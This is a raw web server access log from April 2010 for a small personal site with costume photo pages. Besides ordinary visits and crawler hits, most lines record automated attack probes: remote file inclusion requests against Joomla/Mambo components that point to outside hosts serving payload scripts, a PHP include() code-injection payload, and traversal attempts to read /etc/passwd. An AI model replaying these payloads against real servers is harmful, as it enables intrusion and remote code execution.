95.26.208.240 - - [23/Apr/2010:06:40:56 -0500] "GET /costume/thmb1.htm HTTP/1.1" 200 3957 "http://tomdolan.pconline.com/costume/costume2.htm""Opera/9.64 (Windows NT 6.0; U; ; MRSPUTNIK OW 2, 2, 0, 94; ru) Presto/2.1.1"
95.26.208.240 - - [23/Apr/2010:06:40:56 -0500] "GET /costume/004_JPG%20copy.jpg HTTP/1.1" 200 44129 "http://tomdolan.pconline.com/costume/thmb1.htm""Opera/9.64 (Windows NT 6.0; U; ; MRSPUTNIK OW 2, 2, 0, 94; ru) Presto/2.1.1"
95.26.208.240 - - [23/Apr/2010:06:40:57 -0500] "GET /costume/008_JPG%20copy.jpg HTTP/1.1" 200 43767 "http://tomdolan.pconline.com/costume/thmb1.htm""Opera/9.64 (Windows NT 6.0; U; ; MRSPUTNIK OW 2, 2, 0, 94; ru) Presto/2.1.1"
95.26.208.240 - - [23/Apr/2010:06:40:57 -0500] "GET /costume/002_JPG%20copy.jpg HTTP/1.1" 200 44353 "http://tomdolan.pconline.com/costume/thmb1.htm""Opera/9.64 (Windows NT 6.0; U; ; MRSPUTNIK OW 2, 2, 0, 94; ru) Presto/2.1.1"
95.26.208.240 - - [23/Apr/2010:06:40:57 -0500] "GET /costume/001_JPG%20copy.jpg HTTP/1.1" 200 46065 "http://tomdolan.pconline.com/costume/thmb1.htm""Opera/9.64 (Windows NT 6.0; U; ; MRSPUTNIK OW 2, 2, 0, 94; ru) Presto/2.1.1"
95.26.208.240 - - [23/Apr/2010:06:40:57 -0500] "GET /costume/003_JPG%20copy.jpg HTTP/1.1" 200 50590 "http://tomdolan.pconline.com/costume/thmb1.htm""Opera/9.64 (Windows NT 6.0; U; ; MRSPUTNIK OW 2, 2, 0, 94; ru) Presto/2.1.1"
95.26.208.240 - - [23/Apr/2010:06:40:57 -0500] "GET /costume/012_JPG%20copy.jpg HTTP/1.1" 200 43366 "http://tomdolan.pconline.com/costume/thmb1.htm""Opera/9.64 (Windows NT 6.0; U; ; MRSPUTNIK OW 2, 2, 0, 94; ru) Presto/2.1.1"
95.26.208.240 - - [23/Apr/2010:06:40:57 -0500] "GET /costume/009_JPG%20copy.jpg HTTP/1.1" 200 47583 "http://tomdolan.pconline.com/costume/thmb1.htm""Opera/9.64 (Windows NT 6.0; U; ; MRSPUTNIK OW 2, 2, 0, 94; ru) Presto/2.1.1"
95.26.208.240 - - [23/Apr/2010:06:40:57 -0500] "GET /costume/005_JPG%20copy.jpg HTTP/1.1" 200 44973 "http://tomdolan.pconline.com/costume/thmb1.htm""Opera/9.64 (Windows NT 6.0; U; ; MRSPUTNIK OW 2, 2, 0, 94; ru) Presto/2.1.1"
95.26.208.240 - - [23/Apr/2010:06:40:57 -0500] "GET /costume/006_JPG%20copy.jpg HTTP/1.1" 200 49320 "http://tomdolan.pconline.com/costume/thmb1.htm""Opera/9.64 (Windows NT 6.0; U; ; MRSPUTNIK OW 2, 2, 0, 94; ru) Presto/2.1.1"
95.26.208.240 - - [23/Apr/2010:06:40:57 -0500] "GET /costume/007_JPG%20copy.jpg HTTP/1.1" 200 43100 "http://tomdolan.pconline.com/costume/thmb1.htm""Opera/9.64 (Windows NT 6.0; U; ; MRSPUTNIK OW 2, 2, 0, 94; ru) Presto/2.1.1"
95.26.208.240 - - [23/Apr/2010:06:40:58 -0500] "GET /costume/009_JPG%20copy.jpg HTTP/1.1" 200 47583 "http://tomdolan.pconline.com/costume/thmb1.htm""Opera/9.64 (Windows NT 6.0; U; ; MRSPUTNIK OW 2, 2, 0, 94; ru) Presto/2.1.1"
95.26.208.240 - - [23/Apr/2010:06:40:58 -0500] "GET /costume/010_jpg%20copy.jpg HTTP/1.1" 200 47369 "http://tomdolan.pconline.com/costume/thmb1.htm""Opera/9.64 (Windows NT 6.0; U; ; MRSPUTNIK OW 2, 2, 0, 94; ru) Presto/2.1.1"
95.26.208.240 - - [23/Apr/2010:06:40:58 -0500] "GET /costume/011_JPG%20copy.jpg HTTP/1.1" 200 46554 "http://tomdolan.pconline.com/costume/thmb1.htm""Opera/9.64 (Windows NT 6.0; U; ; MRSPUTNIK OW 2, 2, 0, 94; ru) Presto/2.1.1"
109.188.35.10 - - [23/Apr/2010:06:41:03 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1059 Safari/532.5"
109.188.35.10 - - [23/Apr/2010:06:41:10 -0500] "GET /costume/links.htm HTTP/1.1" 200 1029 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1059 Safari/532.5"
109.188.35.10 - - [23/Apr/2010:06:41:11 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1059 Safari/532.5"
207.46.13.141 - - [23/Apr/2010:06:41:55 -0500] "GET /logs/access_log.1220745600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
83.222.124.113 - - [23/Apr/2010:06:42:30 -0500] "GET /logs/access_log.1220054400///administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://ssp3.ilawa.pl/components/com_zoom/tabs/do? HTTP/1.1" 404 373 "-""Mozilla/5.0"
83.222.124.113 - - [23/Apr/2010:06:43:05 -0500] "GET /logs/access_log.1220054400///administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://ssp3.ilawa.pl/components/com_zoom/tabs/do? HTTP/1.1" 404 373 "-""Mozilla/5.0"
95.26.208.240 - - [23/Apr/2010:06:43:43 -0500] "GET /costume/index1.htm HTTP/1.1" 200 21829 "http://tomdolan.pconline.com/costume/costume2.htm""Opera/9.64 (Windows NT 6.0; U; ; MRSPUTNIK OW 2, 2, 0, 94; ru) Presto/2.1.1"
95.26.208.240 - - [23/Apr/2010:06:43:48 -0500] "GET /costume/thmb1.htm HTTP/1.1" 304 - "http://tomdolan.pconline.com/costume/index1.htm""Opera/9.64 (Windows NT 6.0; U; ; MRSPUTNIK OW 2, 2, 0, 94; ru) Presto/2.1.1"
95.26.208.240 - - [23/Apr/2010:06:43:53 -0500] "GET /costume/thmb1.htm HTTP/1.1" 304 - "http://tomdolan.pconline.com/costume/index1.htm""Opera/9.64 (Windows NT 6.0; U; ; MRSPUTNIK OW 2, 2, 0, 94; ru) Presto/2.1.1"
95.26.208.240 - - [23/Apr/2010:06:44:01 -0500] "GET /costume/thmb1.htm HTTP/1.1" 304 - "http://tomdolan.pconline.com/costume/index1.htm""Opera/9.64 (Windows NT 6.0; U; ; MRSPUTNIK OW 2, 2, 0, 94; ru) Presto/2.1.1"
95.26.208.240 - - [23/Apr/2010:06:44:06 -0500] "GET /costume/thmb1.htm HTTP/1.1" 304 - "http://tomdolan.pconline.com/costume/index1.htm""Opera/9.64 (Windows NT 6.0; U; ; MRSPUTNIK OW 2, 2, 0, 94; ru) Presto/2.1.1"
109.188.35.10 - - [23/Apr/2010:06:47:34 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1059 Safari/532.5"
109.188.35.10 - - [23/Apr/2010:06:47:34 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1059 Safari/532.5"
109.188.35.10 - - [23/Apr/2010:06:47:38 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1059 Safari/532.5"
124.138.115.131 - - [23/Apr/2010:06:48:34 -0500] "GET //box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""libwww-perl/5.805"
124.138.115.131 - - [23/Apr/2010:06:54:25 -0500] "GET /logs/access_log.1271030400//box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 327 "-""libwww-perl/5.805"
124.138.115.131 - - [23/Apr/2010:06:54:31 -0500] "GET //box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""libwww-perl/5.805"
124.138.115.131 - - [23/Apr/2010:06:54:36 -0500] "GET /logs//box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 305 "-""libwww-perl/5.805"
69.175.97.154 - - [23/Apr/2010:06:57:32 -0500] "GET ////components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
69.175.97.154 - - [23/Apr/2010:06:57:32 -0500] "GET /logs////components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
69.175.97.154 - - [23/Apr/2010:06:57:32 -0500] "GET /logs/access_log.1268611200////components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
69.175.97.154 - - [23/Apr/2010:06:57:40 -0500] "GET /logs/access_log.1219363200////components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
207.46.204.197 - - [23/Apr/2010:06:58:25 -0500] "GET /logs/access_log.1210896000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.47 - - [23/Apr/2010:06:59:24 -0500] "GET /logs/access_log.1158624000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.121.30.111 - - [23/Apr/2010:07:00:12 -0500] "GET ////components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
91.121.30.111 - - [23/Apr/2010:07:00:12 -0500] "GET /logs////components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
91.121.30.111 - - [23/Apr/2010:07:00:12 -0500] "GET /logs/access_log.1268611200////components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
174.121.75.26 - - [23/Apr/2010:07:00:13 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""GeoHasher/Nutch-1.0 (GeoHasher Web Search Engine; geohasher.gotdns.org; geo_hasher at yahoo * com)"
174.121.75.26 - - [23/Apr/2010:07:00:13 -0500] "GET /logs/ HTTP/1.0" 200 2825 "-""GeoHasher/Nutch-1.0 (GeoHasher Web Search Engine; geohasher.gotdns.org; geo_hasher at yahoo * com)"
207.46.195.238 - - [23/Apr/2010:07:00:24 -0500] "GET /logs/access_log.1261180800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.121.30.111 - - [23/Apr/2010:07:00:25 -0500] "GET /logs/access_log.1219363200////components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
207.46.199.40 - - [23/Apr/2010:07:00:54 -0500] "GET /logs/access_log.1239062400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
61.8.3.157 - - [23/Apr/2010:07:03:32 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
61.8.3.157 - - [23/Apr/2010:07:03:32 -0500] "GET /logs/access_log.1212969600%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
61.8.3.157 - - [23/Apr/2010:07:03:32 -0500] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
61.8.3.157 - - [23/Apr/2010:07:03:33 -0500] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
61.8.3.157 - - [23/Apr/2010:07:03:33 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
61.8.3.157 - - [23/Apr/2010:07:03:33 -0500] "GET /logs/access_log.1212969600%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
61.8.3.157 - - [23/Apr/2010:07:03:45 -0500] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
61.8.3.157 - - [23/Apr/2010:07:03:45 -0500] "GET /logs/access_log.1212969600%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
61.8.3.157 - - [23/Apr/2010:07:03:45 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
61.8.3.157 - - [23/Apr/2010:07:06:20 -0500] "GET /logs/access_log.1221696000//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
61.8.3.157 - - [23/Apr/2010:07:07:03 -0500] "GET /logs/access_log.1221696000//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
61.8.3.157 - - [23/Apr/2010:07:08:04 -0500] "GET /logs/access_log.1221696000//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
207.46.204.181 - - [23/Apr/2010:07:10:55 -0500] "GET /logs/access_log.1250899200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.121.167.15 - - [23/Apr/2010:07:15:16 -0500] "GET /logs/access_log.1212105600///index.php?option=com_artlinks&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
91.121.167.15 - - [23/Apr/2010:07:15:16 -0500] "GET ///index.php?option=com_artlinks&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
91.121.167.15 - - [23/Apr/2010:07:15:17 -0500] "GET /logs///index.php?option=com_artlinks&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
65.254.54.122 - - [23/Apr/2010:07:15:17 -0500] "GET /logs/access_log.1212105600///index.php?option=com_artlinks&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
65.254.54.122 - - [23/Apr/2010:07:15:17 -0500] "GET ///index.php?option=com_artlinks&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
65.254.54.122 - - [23/Apr/2010:07:15:17 -0500] "GET /logs///index.php?option=com_artlinks&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
204.14.3.162 - - [23/Apr/2010:07:15:52 -0500] "GET /logs/access_log.1212105600///index.php?option=com_artlinks&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
204.14.3.162 - - [23/Apr/2010:07:15:52 -0500] "GET ///index.php?option=com_artlinks&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
204.14.3.162 - - [23/Apr/2010:07:15:52 -0500] "GET /logs///index.php?option=com_artlinks&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
216.151.164.53 - - [23/Apr/2010:07:16:11 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.thaianglican.org/song_doc/a.jpg?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
216.151.164.53 - - [23/Apr/2010:07:16:11 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.thaianglican.org/song_doc/a.jpg?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
216.151.164.53 - - [23/Apr/2010:07:16:11 -0500] "GET /logs/access_log.1219363200%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.thaianglican.org/song_doc/a.jpg?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
91.121.30.111 - - [23/Apr/2010:07:18:28 -0500] "GET /logs////components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
91.121.30.111 - - [23/Apr/2010:07:18:28 -0500] "GET /logs/access_log.1219363200%20%20////components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
91.121.30.111 - - [23/Apr/2010:07:18:28 -0500] "GET ////components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
69.175.97.154 - - [23/Apr/2010:07:20:22 -0500] "GET /logs/access_log.1219363200%20%20////components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
69.175.97.154 - - [23/Apr/2010:07:20:22 -0500] "GET /logs////components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
69.175.97.154 - - [23/Apr/2010:07:20:27 -0500] "GET ////components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
91.121.167.15 - - [23/Apr/2010:07:21:26 -0500] "GET /logs///index.php?option=com_artlinks&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
91.121.167.15 - - [23/Apr/2010:07:21:26 -0500] "GET ///index.php?option=com_artlinks&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
91.121.30.111 - - [23/Apr/2010:07:21:48 -0500] "GET /logs/access_log.1219363200////components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
195.216.234.1 - - [23/Apr/2010:07:21:54 -0500] "GET /logs///index.php?option=com_artlinks&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
195.216.234.1 - - [23/Apr/2010:07:21:54 -0500] "GET ///index.php?option=com_artlinks&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
65.254.54.122 - - [23/Apr/2010:07:24:12 -0500] "GET /logs///index.php?option=com_artlinks&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
65.254.54.122 - - [23/Apr/2010:07:24:12 -0500] "GET ///index.php?option=com_artlinks&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
69.175.97.154 - - [23/Apr/2010:07:24:17 -0500] "GET /logs/access_log.1219363200////components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
204.14.3.162 - - [23/Apr/2010:07:24:26 -0500] "GET /logs///index.php?option=com_artlinks&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
204.14.3.162 - - [23/Apr/2010:07:24:26 -0500] "GET ///index.php?option=com_artlinks&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
69.175.97.154 - - [23/Apr/2010:07:24:56 -0500] "GET ////components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
69.175.97.154 - - [23/Apr/2010:07:24:56 -0500] "GET /logs////components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
69.175.97.154 - - [23/Apr/2010:07:24:56 -0500] "GET /logs/access_log.1219363200%20%20////components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
91.121.30.111 - - [23/Apr/2010:07:25:51 -0500] "GET /logs////components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
91.121.30.111 - - [23/Apr/2010:07:25:51 -0500] "GET ////components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
91.121.30.111 - - [23/Apr/2010:07:25:51 -0500] "GET /logs/access_log.1219363200%20%20////components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
69.175.97.154 - - [23/Apr/2010:07:27:06 -0500] "GET ////components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
69.175.97.154 - - [23/Apr/2010:07:27:06 -0500] "GET /logs/access_log.1219363200////components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
69.175.97.154 - - [23/Apr/2010:07:27:06 -0500] "GET /logs////components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
124.49.100.254 - - [23/Apr/2010:07:28:39 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
124.49.100.254 - - [23/Apr/2010:07:28:39 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
124.49.100.254 - - [23/Apr/2010:07:28:39 -0500] "GET /logs/access_log.1270598400%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
65.254.54.122 - - [23/Apr/2010:07:29:59 -0500] "GET /logs/access_log.1219708800///index.php?option=com_artlinks&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
65.254.54.122 - - [23/Apr/2010:07:29:59 -0500] "GET ///index.php?option=com_artlinks&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
65.254.54.122 - - [23/Apr/2010:07:29:59 -0500] "GET /logs///index.php?option=com_artlinks&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
124.49.100.254 - - [23/Apr/2010:07:30:35 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
124.49.100.254 - - [23/Apr/2010:07:30:35 -0500] "GET /logs/access_log.1270598400%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
124.49.100.254 - - [23/Apr/2010:07:30:35 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
91.121.167.15 - - [23/Apr/2010:07:30:47 -0500] "GET /logs/access_log.1219708800///index.php?option=com_artlinks&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
91.121.167.15 - - [23/Apr/2010:07:30:47 -0500] "GET ///index.php?option=com_artlinks&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
91.121.167.15 - - [23/Apr/2010:07:30:48 -0500] "GET /logs///index.php?option=com_artlinks&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
124.49.100.254 - - [23/Apr/2010:07:31:45 -0500] "GET /logs/access_log.1270598400%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
124.49.100.254 - - [23/Apr/2010:07:31:45 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
124.49.100.254 - - [23/Apr/2010:07:31:45 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
65.254.54.122 - - [23/Apr/2010:07:31:57 -0500] "GET /logs///index.php?option=com_artlinks&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
65.254.54.122 - - [23/Apr/2010:07:31:57 -0500] "GET ///index.php?option=com_artlinks&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
195.216.234.1 - - [23/Apr/2010:07:33:49 -0500] "GET /logs///index.php?option=com_artlinks&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
